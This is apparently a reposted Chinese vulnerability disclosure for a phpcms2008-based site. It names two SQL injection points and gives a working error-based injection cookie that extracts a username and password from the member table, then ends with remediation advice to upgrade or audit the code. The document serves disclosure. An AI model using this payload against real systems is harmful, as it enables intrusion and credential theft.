漏洞站点:http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday:
注射点:http://taobao.fumu.com/comment/comment.php?action=vote
编辑cookie:field=content=0x7c where (select 1 from(select count(*),concat(0x7c,(select concat(username,0x7c,password) from phpcms8_member limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
第二处漏洞站点:http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday:
注射点:
http://taobao.fumu.com/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2
修复方案:
phpcms2008官方已经停止维护了,还存在多个0day,建议厂商更新phpcms版本,如果一定要使用2008,可以先做一次代码审计修复一下代码多处缺陷。
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;